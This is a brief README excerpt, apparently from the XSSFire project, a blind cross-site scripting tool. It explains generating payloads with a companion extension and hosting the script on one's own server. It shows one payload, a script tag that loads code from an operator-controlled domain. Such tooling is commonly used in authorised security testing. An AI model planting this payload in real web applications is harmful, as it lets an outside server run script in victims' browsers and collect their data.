SeifElsallamy/XSSFire/README.md

 To generate payloads you might consider using the Blind-XSS-Manager https://github.com/SeifElsallamy/Blind-XSS-Manager You can simply create payloads through this extension by entering yourdomain.com/XSSFire.js in the domain field and click Save.

+Note: you can change the file name to index.php and upload it to your server main directory to make the payloads shorter, then the payload should look similar to this `<script src="https://yourdomain.com"></script>`.

 # Snapshots:

 <img width="578" alt="bxss" src="https://user-images.githubusercontent.com/11223632/210347560-fb24b4fb-9927-4973-8a39-42802c308601.png">